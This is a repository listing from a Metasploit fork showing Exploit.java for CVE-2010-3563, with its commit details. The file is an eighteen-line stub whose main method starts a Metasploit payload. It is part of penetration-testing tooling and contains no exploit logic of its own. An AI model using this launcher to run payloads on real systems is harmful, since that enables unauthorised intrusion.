Files
metasploit-gs/external/source/exploits/CVE-2010-3563/Exploit.java
T
James Lee 6f7af42667 add an exploit for cve-2010-3563, thanks Matthias Kaiser
git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da
2010-11-19 23:02:35 +00:00

18 lines
275 B
Java

import metasploit.Payload;
/**
*
* This class starts the metasploit payload.
* @author mka
*
*/
public class Exploit {
public static void main(String[] args) {
try {
Payload.main(null);
} catch (Exception e) {
e.printStackTrace();
}
}
}